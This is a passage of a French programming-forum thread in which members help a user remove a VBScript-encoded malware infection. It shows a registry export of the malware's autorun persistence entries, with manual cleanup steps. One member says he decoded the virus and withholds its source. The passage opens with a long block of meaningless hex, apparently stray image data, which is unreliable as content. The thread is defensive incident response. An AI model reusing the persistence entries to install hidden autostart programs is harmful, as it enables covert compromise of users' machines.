10EB3AFADB7AAB9AEB2B01303C0C103BFC2C0C4C5B6BDB8CABACCBCB5BECEA8BBD3D2B400C90EC5C60FDBC3DDDBD9D8D1D0CBE5CDE7CFE3E6EBE8EDEAE2DEC7C2F3C1E2F7E4EFD5E9FBFAD7F8ECE26DABC74D5BB87C00DD258487B061C07CF2C015233860613F8BFF1C2AD4C8901B5D44831325D263974E03C97726DD95BC70B2A54A0021EB699898000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D3781A3F80828AAA56A2561E416BB16E496F36DE7BCC9A6931F8A86331177461D2CD963149D48A84328080A8F4BA98CC9D562B75E25F835AE4D85D6DF772D6637C9EE2E5C4C4DB3E2E1B7B9FC9CEBFB7B5F7527576D867F517E7281878B7640846A8D798E898C88598A945A83673F05A0A10513A2A1A4A5A30FA8A90EABA7A5AFA2B1A6AAA8B3A01303BABB03B9BCBAAEB5B0C2B2C4B4ADB6C6B8CAAC00C1C8C3D0C50EBFBABEBFCFCEC9D2C7DAD1DED3E0DDD9E4DBE2CBD4D5D7BCE5DFEDE1EFE3E6F1E8E7CDD5BD0FF8F4CDFCB7FDF302BA13180EDFBA5DFE98FD5BA8B021B77A09D3FD3A68ED1B370D16C5610C77F10C42C68F1C355E9838921780040021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CABF61D3781A308998EA0AA1BD99A9584B9B175D27189EF70FEACC09AAEC7630C8D37A212395BCA5E4C0070254C46ABCDAB2FFBC442BBDBAF8D3B964E05DE74585D04B7CB6C67F98C5EDBDF47B73C0FBFEF7F67715A78567A837F647C8A805382868F7D8489859188621374059A9B05139C9B9E9F9D0FA2A30EA5A19FA99CABA0A4A2AD9AB1A60003B6B703A8AFAABBACBDAEA7B0BFB2C3B4BAC1BCC8BECAC0B5B8B6C700D1D3C2CCC4D6C6D5D2DAD4C9DBDECFD0DCE3DEDDCBDFE7E6CDEAD7E8CDE1B9E4E9F2EBF4EDECD9E5F6B4F0F8B3FFC5006213E8EEDEBE09F0DC69F0C66CE1B98617182A8CF870622B87CD1C3C0390000021F904090A0000002C0000000080000F000003E708B40BFEAC3D17C9A4F1AA7CABF61D3781A3089918B391AB5949A9FB96EC6B9DF58CCBB9DDF340D54E1823B68C365A107664FA744527B4798B56A94AE4343994FE9E57AE35EB5D86B7E86F590B5EBBCF6AB8992C67CFBB3EBA1EBF1FF3FF7E81587862838285886977878A760C059091051392919495930F98990E9B97959F92A1969A98A390A79C009B9EA5A0AEA2B0A49DA6B2A8B6AAADB4AFBBB1BDB3ABACBCC1C3BAC4BEC7C0C6CBB5BFB7CEB9CDC9C2A9D5B8D6D0D8D3D1C5D2CCC2CADEE2DDE4C8DFE6E3E8E5E0DAE7E1EBCFDBEDE9EFEAA2C3BF1AF8C9FAC8F917FB02FAE3077020A804003B000000000000000000
    Salut Hackoofr.
    voici ci-dessous le resultat de la recherche de Systemprotection.exe
    REGEDIT4
    ; RegSearch.vbs © Hackoo Crackoo

    ; Résultat de la Recherche pour le mot "systemprotection.exe" 18/09/2013 11:45:40

    ; NOTE: Ce fichier va être supprimer si vous ne le sauvegarder pas avec WordPad.
    ; Vous avez interêt de le sauvgarder vers un nouveau emplaçement si vous-voulez l'utiliser aprés.
    ; (si vous sauvegarder le fichier avec l'extension .reg , Vous Pouvez l'utiliser pour restaurer afin de restaurer chaque changement de la base de registre que vous faites pour ces valeurs..)


    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    "Updates"="\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\""

    [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    "Updates"="\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\""
    Répondre avec citation Répondre avec citation   0  0
  17. 18/09/2013, 14h15 #17
    BenjGe
    BenjGe est déconnecté
    Membre expérimenté
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    Avril 2008
    Messages
    875
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : Avril 2008
    Messages : 875
    Points : 1 394
    Points
    1 394
    Par défaut
    ok

    télécharge l'utilitaire procmon de sysinternals, lance le comme admin, cherche le processus systemprotection fais un clic droit dessus et choisir suspend. Fais de même avec les processus uac.bat CPBA.bat, Admin.vbe et tp.vbe si ils existent.
    Une les processus figés tue les via clic droit.

    ensuite supprime tous tes fichiers temporaires (c'est à dire les scripts cités plus haut)

    supprime les 2 clés de registre que tu as repéré avec les scripts de hackoofr (ou alors va dans msconfig démarrage, trouve la ligne sur systemprotection et désactive la)


    Enfin redémarre l'ordi tout devrait rentrer dans l'ordre.

    Cependant sache que ton ordi a été compromis, tu devrais nous renvoyer le blood.dat à hackoofr voir si il peut en faire quelque chose
    Répondre avec citation Répondre avec citation   0  0
  18. 18/09/2013, 21h09 #18
    ledouxxx
    ledouxxx est déconnecté
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2013
    Messages
    10
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Santé

    Informations forums :
    Inscription : Août 2013
    Messages : 10
    Points : 5
    Points
    5
    Par défaut impossible d'exécuter Procmon
    hello Benjile.
    je viens de télécharger Procmon, et quand je le lance, il ne se passe rien!
    je suis un peu planté. et aussi quand j'ouvre msconfig, il n'y existe pas le system protection.exe dans les programmes de démarrage.
    Répondre avec citation Répondre avec citation   0  0
  19. 18/09/2013, 21h17 #19
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut

    Bon, J'ai décodé, le Virus et si quelqu'un veut son code source, et ceci juste par curiosité bien sur, alors il peut me contacter par messagerie privé car ce Virus est trop dangereux donc je ne le poste pas en publique
    Vous pouvez aussi vérifier vos processus et vos exécutables par [HTA] Vérificateur des Processus + VirusTotal uploader

    Répondre avec citation Répondre avec citation   0  0
  20. 20/09/2013, 14h17 #20
    BenjGe
    BenjGe est déconnecté
    Membre expérimenté
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    Avril 2008
    Messages
    875
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : Avril 2008
    Messages : 875
    Points : 1 394
    Points
    1 394
    Par défaut
    et en gros que fait il ce virus?
    Répondre avec citation Répondre avec citation   0  0
+ Répondre à la discussion
Cette discussion est résolue.
Page 1 sur 2 12 DernièreDernière
Actualités
« Discussion précédente | Discussion suivante »

Discussions similaires

  1. [Batch] lancer un programme qui s'excute tous seul en batch
    Par mafia2b dans le forum Scripts/Batch
    Réponses: 3
    Dernier message: 10/11/2013, 17h38
  2. [Batch] Aide pour développer un batch qui permet de filtrer les fichiers d'un répertoire
    Par mido2010 dans le forum Scripts/Batch
    Réponses: 5
    Dernier message: 24/03/2011, 17h56
  3. [MySQL] Variable qui s'actualise tous les jours
    Par zathuros dans le forum PHP & Base de données
    Réponses: 4
    Dernier message: 03/11/2008, 14h22
  4. généré un fichier texte qui prend en ecompte les accents
    Par Ohemeg dans le forum Scripts/Batch
    Réponses: 2
    Dernier message: 21/02/2008, 10h43
  5. Requete sur 3 tables dont une qui correspond pas à tous les critères
    Par lama85 dans le forum Requêtes
    Réponses: 2
    Dernier message: 25/09/2006, 14h04

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo